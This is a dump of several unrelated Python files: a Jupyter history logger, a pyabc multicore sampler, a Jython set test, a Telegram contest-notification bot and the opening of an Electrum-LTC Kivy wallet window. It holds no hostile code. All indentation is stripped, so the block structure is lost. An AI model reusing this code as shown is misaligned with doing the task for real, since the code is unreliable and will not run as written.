git_root = os.path.abspath(script_dict['repo_root']) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(a_abs, os.path.join(git_root, script_dict['working_dir']))
argvs += ' {}'.format(a)
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(
vars(sys.modules['__main__'])['__package__'], (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
auxiliary_git_diff = attr.ib(default=None)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are in still in cell execution otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
|
multicore.py
|
from multiprocessing import Process, Queue
from .singlecore import SingleCoreSampler
import numpy as np
import random
import logging
import cloudpickle as pickle
from jabbar import jabbar
from .multicorebase import MultiCoreSampler, get_if_worker_healthy
logger = logging.getLogger("MulticoreSampler")
SENTINEL = None
def feed(feed_q, n_jobs, n_proc):
for _ in range(n_jobs):
feed_q.put(1)
for _ in range(n_proc):
feed_q.put(SENTINEL)
def work(feed_q, result_q, simulate_one, max_eval, single_core_sampler):
# unwrap arguments
if isinstance(simulate_one, bytes):
simulate_one = pickle.loads(simulate_one)
random.seed()
np.random.seed()
while True:
arg = feed_q.get()
if arg == SENTINEL:
break
res = single_core_sampler.sample_until_n_accepted(
1, simulate_one, max_eval)
result_q.put((res, single_core_sampler.nr_evaluations_))
class MulticoreParticleParallelSampler(MultiCoreSampler):
"""
Samples on multiple cores using the multiprocessing module.
This sampler is optimized for low latencies and is efficient, even
if the individual model evaluations are fast.
Requires no pickling of the ``sample_one``,
``simulate_one`` and ``accept_one`` function.
This is achieved using fork on linux (see :class:`Sampler`).
The simulation results are still pickled as they are transmitted
from the worker processes back to the parent process.
Depending on the kind of summary statistics this can be fast or slow.
If your summary statistics are only a dict with a couple of numbers,
the overhead should not be substantial.
However, if your summary statistics are large numpy arrays
or similar, this could cause overhead
Parameters
----------
n_procs: int, optional
If set to None, the Number of cores is determined according to
:func:`pyabc.sge.nr_cores_available`.
.. warning::
Windows support is *not* tested.
As there is no fork on Windows. This sampler might not work.
"""
def sample_until_n_accepted(
self, n, simulate_one, t, *,
max_eval=np.inf, all_accepted=False, ana_vars=None):
# starting more than n jobs
# does not help in this parallelization scheme
n_procs = min(n, self.n_procs)
logger.debug("Start sampling on {} cores ({} requested)"
.format(n_procs, self.n_procs))
feed_q = Queue()
result_q = Queue()
feed_process = Process(target=feed, args=(feed_q, n,
n_procs))
single_core_sampler = SingleCoreSampler(
check_max_eval=self.check_max_eval)
# the max_eval handling in this sampler is certainly not optimal
single_core_sampler.sample_factory = self.sample_factory
# wrap arguments
if self.pickle:
simulate_one = pickle.dumps(simulate_one)
args = (feed_q, result_q, simulate_one, max_eval, single_core_sampler)
worker_processes = [Process(target=work, args=args)
for _ in range(n_procs)]
for proc in worker_processes:
proc.start()
feed_process.start()
collected_results = []
for _ in jabbar(range(n), enable=self.show_progress, keep=False):
res = get_if_worker_healthy(worker_processes, result_q)
collected_results.append(res)
feed_process.join()
for proc in worker_processes:
proc.join()
# Queues get closed automatically on garbage collection
# No explicit closing necessary.
results, evaluations = zip(*collected_results)
self.nr_evaluations_ = sum(evaluations)
# create 1 to-be-returned sample from results
sample = self._create_empty_sample()
for result in results:
sample += result
if sample.n_accepted < n:
sample.ok = False
return sample
|
test_set_jy.py
|
import unittest
from test import test_support
import threading
if test_support.is_jython:
from java.io import (ByteArrayInputStream, ByteArrayOutputStream,
ObjectInputStream, ObjectOutputStream)
from java.util import Random
from javatests import PySetInJavaTest
class SetTestCase(unittest.TestCase):
def test_binops(self):
class Foo(object):
__rsub__ = lambda self, other: 'rsub'
__ror__ = lambda self, other: 'ror'
__rand__ = lambda self, other: 'rand'
__rxor__ = lambda self, other: 'rxor'
foo = Foo()
s = set()
self.assertEqual(s - foo, 'rsub')
self.assertEqual(s | foo, 'ror')
self.assertEqual(s & foo, 'rand')
self.assertEqual(s ^ foo, 'rxor')
def test_pop_race(self):
# issue 1854
nthreads = 200
# the race might not happen the first time so we try a few just in case
for i in xrange(4):
s = set(range(200))
threads = [threading.Thread(target=s.pop) for i in range(nthreads)]
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(len(s), 0)
def test_big_set(self):
"""Verify that fairly large collection literals of primitives can be constructed."""
# use \n to separate to avoid parser problems
s = eval("{" + ",\n".join((str(x) for x in xrange(64000))) +"}")
self.assertEqual(len(s), 64000)
self.assertEqual(sum(s), 2047968000)
class SetInJavaTestCase(unittest.TestCase):
"""Tests for derived dict behaviour"""
def test_using_PySet_as_Java_Set(self):
PySetInJavaTest.testPySetAsJavaSet()
def test_accessing_items_added_in_java(self):
s = PySetInJavaTest.createPySetContainingJavaObjects()
for v in s:
self.assert_(v in s)
if isinstance(v, unicode):
self.assertEquals("value", v)
else:
# Should be a java.util.Random; ensure we can call it
v.nextInt()
def test_java_accessing_items_added_in_python(self):
# Test a type that should be coerced into a Java type, a Java
# instance that should be wrapped, and a Python instance that
# should pass through as itself with str, Random and tuple
# respectively.
s = set(["value", Random(), ("tuple", "of", "stuff")])
PySetInJavaTest.accessAndRemovePySetItems(s)
# Check that the Java removal affected the underlying set
self.assertEquals(0, len(s))
def test_serialization(self):
s = set(range(5, 10))
output = ByteArrayOutputStream()
serializer = ObjectOutputStream(output)
serializer.writeObject(s)
serializer.close()
input = ByteArrayInputStream(output.toByteArray())
unserializer = ObjectInputStream(input)
self.assertEqual(s, unserializer.readObject())
def test_main():
tests = [SetTestCase]
if test_support.is_jython:
tests.append(SetInJavaTestCase)
test_support.run_unittest(*tests)
if __name__ == '__main__':
test_main()
|
contestNoti_Bot.py
|
#-*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import pickle
from ContestParser import *
from MyScheduler import * # import Scheduler
from SupportMysql import * # import SQL support class
import threading
# Telegram interface
import telebot
from telebot import types, apihelper
API_TOKEN = '<INPUT_YOUR_API_KEY>'
bot = telebot.TeleBot(API_TOKEN)
administratorChatID = '<INPUT_YOUR_TELEGRAM_CHAT_ID>'
host = '<INPUT_YOUR_DATABASE_SERVER_HOST>'
db_id = '<INPUT_YOUR_DATABASE_ID>'
db_pw = '<INPUT_YOUR_DATABASE_PASSWORD>'
db_name = '<INPUT_YOUR_DATABASE_NAME>'
db = MySQLdb.connect( host, db_id, db_pw, db_name, charset='utf8') # Encoding utf-8
mydb = SupportMysql(db) # DB controller
scheduler = Scheduler(bot)
parser = ContestParser()
# /help 명령어를 사용하였을때 전송할 메시지
help_message =(
"<INPUT_YOUR_HELP_MESSAGE>"
)
# /start 명령어를 사용하였을때 전송할 메시지
start_message_True=( # 데이터베이스에 성공적으로 사용자를 저장하였을 경우
"<INPUT_YOUR_MESSAGE>"
)
start_message_False=( # 데이터베이스에 이미 저장되있는 사용자일 경우
"<INPUT_YOUR_MESSAGE>"
)
# /unsubscribe 명령어를 사용하였을때 전송할 메시지
unsubscribe_message = (
"<INPUT_YOUR_MESSAGE>"
)
def sendNotification(bot, mydb):
''' 웹 사이트를 파싱 후 새로 업데이트된 정보를 확인하고 사용자들에게 메시지를 전송 '''
notiList = [] # [[site name, parsing list]...] 알림을 전송해야하는 리스트 저장
ContestListFile = [] # 정보가 저장되어있는 파일 이름 목록 저장
siteList = parser.siteList # 지원하는 사이트 이름을 가져옴(웹사이트 파싱때 사용)
siteNameList = parser.siteNameList # 지원하는 사이트 이름을 한글로 가져옴(메시지 전송때 사용)
parsingData = [] # 파싱된 데이터들이 저장됨
for s in siteList:
ContestListFile.append(s + "List.data") # 저장된 파일 이름 목록을 저장
temp = parser.returnParsingData(s) # 각 웹사이트를 파싱해서 임시 변수에 저장
parsingData.append(temp)
for parData in parsingData: # 각각의 웹사이트별로 파싱된 정보를 이용
before = [] # 이전에 파싱했던 정보를 가져옴 (이전 기록과 현재기록을 비교해 새롭게 업데이트된 리스트를 체크하기 위함)
# 무식한 방법이지만 우선 이렇게 처리
index = int(parsingData.index(parData))
fileName = ContestListFile[index]
siteName = siteNameList[index]
try: # 저장된 파일이 존재할 경우
# 이전에 저장한 기록을 로드
f = open(fileName, 'rb')
before = pickle.load(f)
f.close()
# 새로 파싱한 정보를 새롭게 저장
f = open(fileName, 'wb')
pickle.dump(parData, f)
f.close()
except: # 저장된 파일이 존재하지 않을 경우
# 새로 파싱한 정보를 새롭게 저장
f = open(fileName, 'wb')
pickle.dump(parData, f)
f.close()
before = parData # 현재 파싱된 정보를 이전 정보로 사용함
# (결과적으로 처음에는 알림이 전송되지 않음)
if before != 'error': # 만약 파싱을 제대로 못하였을 경우(사이트 구조가 바꼈을 경우 등)
for b in before: # 파싱한 공모전의 세부 리스트를 반복(한 사이트의 여러 공모전 목록)
# 이전 기록의 가장 최근에 업데이트된 공모전부터
# 새롭게 파싱한 목록에서 몇번째 인덱스인지 확인
# 혹시 이전에 기록된 공모전 소개 페이지가 이후 삭제되었을 경우를 대비해
# 새롭게 파싱한 목록에서 찾을 수 있을때까지 반복
tempIndex = parser.findListIndex(parData, b)
if tempIndex != -1: # 찾았을 경우 (못 찾을 경우 -1이 리턴됨)
saveList = [] # 새롭게 업데이트된 공모전들이 저장됨
for i in range(tempIndex): # 새롭게 업데이트된 공모전들 저장
saveList.append(parData[i])
notiList.append([siteName, saveList]) # 사이트 이름과 함께 저장(추후 사전으로 변경)
break
elif before == 'error': # 사이트에서 제대로 파싱하지 못했을 경우 빠르게 대응하기 위해
bot.send_message(administratorChatID, "{} 사이트 에러 확인 요망".format(siteName)) # 관리자에게 에러 메시지 전송
pass
else:
pass
messageList = [] # 전송할 메시지들이 저장됨 (새롭게 업데이트된 공모전 리스트)
for n in notiList: # 전송할 메시지를 제작
siteName = n[0]
parserList = n[1]
for p in parserList:
text = (
"[{siteName}] {title} | {period} | {sponsor}\n{url}"
)
msg = text.format(siteName=siteName, title=p['title'], period=p['period'], sponsor=p['sponsor'],
url=p['url'])
messageList.append(msg)
memberList = mydb.returnCommand("SELECT * FROM memberTbl") # DB에 저장된 사용자들을 가져옴
if memberList == 'error': # DB에서 가져올때 에러값이 리턴되었을 경우
bot.send_message(administratorChatID, "DB 에러 확인 요망") # 관리자에게 에러 메시지 전송
else:
for data in memberList: # 사용자들에게 메시지 전송 (전송 속도를 위해 스레드 사용)
cid = data[0]
t = threading.Thread(target=sendContest, args=(bot, mydb, cid, messageList))
t.start()
def sendContest(bot, mydb, cid, messageList):
''' 공모전 알림을 사용자들에게 전송함 '''
for msg in messageList:
try: # 메시지 전송을 시도
bot.send_message(cid, msg)
except telebot.apihelper.ApiException as e:
error_code = str(e.result) # 에러코드를 저장함
if error_code.find("403") != -1: # 403에러(사용자가 봇을 삭제 및 정지하였을 경우 발생)가 발생했을 경우
# 사용자를 DB에서 제거함
msg = mydb.deleteMsg('memberTbl', "chatID = '{}'".format(cid))
check = mydb.setCommand(msg)
if check==False: # DB에서 정상적으로 명령어를 실행하지 못했을 경우
bot.send_message(administratorChatID, "DB 멤버삭제 에러") # 관리자에게 에러 메시지 전송
break
if __name__ == '__main__':
scheduler.scheduler('cron', "1", sendNotification, bot, mydb) # 7~20시 사이에 10분 간격으로 동작
pass
# When receive '/start, /subscribe' command
@bot.message_handler(commands=['start', 'subscribe'])
def send_start(m):
''' Register user chatID in the database '''
cid = m.chat.id # Get chat ID
check = mydb.initMember(cid) # Verify that the user has already been registered and register user chatId in a database.
name = m.chat.last_name + m.chat.first_name # Get user name
markup = types.ReplyKeyboardHide() # Keyboard markup
if check: # Send success message
msg = start_message_True.format(name, name, cid) + '\n\n' + help_message
try:
bot.send_message(cid, msg, reply_markup=markup)
except telebot.apihelper.ApiException as e:
pass
else: # Send fail message
msg = start_message_False.format(name)
try:
bot.send_message(cid, msg, reply_markup=markup)
except telebot.apihelper.ApiException as e:
pass
# When receive '/unsubscribe' command
@bot.message_handler(commands=['unsubscribe'])
def subscribe(m):
''' 데이터베이스에서 구독 정보를 삭제함 '''
cid = m.chat.id
name = m.chat.last_name + m.chat.first_name # Get user name
msg = mydb.deleteMsg('memberTbl', "chatID = '{}'".format(cid))
check = mydb.setCommand(msg)
if check: # DB에서 정상적으로 명령어를 실행하였을 경우
bot.send_message(cid, unsubscribe_message.format(name=name))
else:
bot.send_message(administratorChatID, "DB 멤버삭제 에러") # 관리자에게 에러 메시지 전송
# When receive '/help' command
@bot.message_handler(commands=['help'])
def send_help(m):
''' Send help message '''
cid = m.chat.id
markup = types.ReplyKeyboardHide()
try:
bot.send_message(cid, help_message, reply_markup=markup)
except telebot.apihelper.ApiException as e:
pass
# When receive '/bot_restart' command
@bot.message_handler(commands=['bot_restart'])
def bot_restart(m):
''' Register user chatID in a database '''
cid = m.chat.id # Get chat ID
if str(cid) == administratorChatID:
bot.send_message(cid, "봇을 재시작합니다.")
os.system("<INPUT_YOUR_RESTART_COMMAND>")
else:
try:
bot.send_message(cid, "권한이 없습니다.")
except telebot.apihelper.ApiException as e:
return
# Receive all message
@bot.message_handler(func=lambda message : True)
def echo_all(m):
if m.text == '/cancel':
pass
elif m.text[0] == '/':
try:
bot.send_message(m.chat.id, '{} 명령어가 존재하지 않습니다.\n이 봇의 명령어는 /help 명령어를 통해 확인할 수 있습니다.'.format(m.text))
except telebot.apihelper.ApiException as e:
pass
else:
pass
bot.polling(none_stop=True)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_ltc.storage import WalletStorage, StorageReadWriteError
from electrum_ltc.wallet_db import WalletDB
from electrum_ltc.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_ltc.plugin import run_hook
from electrum_ltc import util
from electrum_ltc.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum_ltc.invoices import PR_PAID, PR_FAILED
from electrum_ltc import blockchain
from electrum_ltc.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_ltc.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_ltc.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_ltc.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_ltc.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_ltc.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_ltc_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_ltc.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum_ltc/gui/kivy/data/fonts/Roboto.ttf',
'electrum_ltc/gui/kivy/data/fonts/Roboto.ttf',
'electrum_ltc/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum_ltc/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_ltc.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_ltc.simple_config import SimpleConfig
from electrum_ltc.plugin import Plugins
from electrum_ltc.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'viacoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_ltc.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('viacoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum_ltc.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
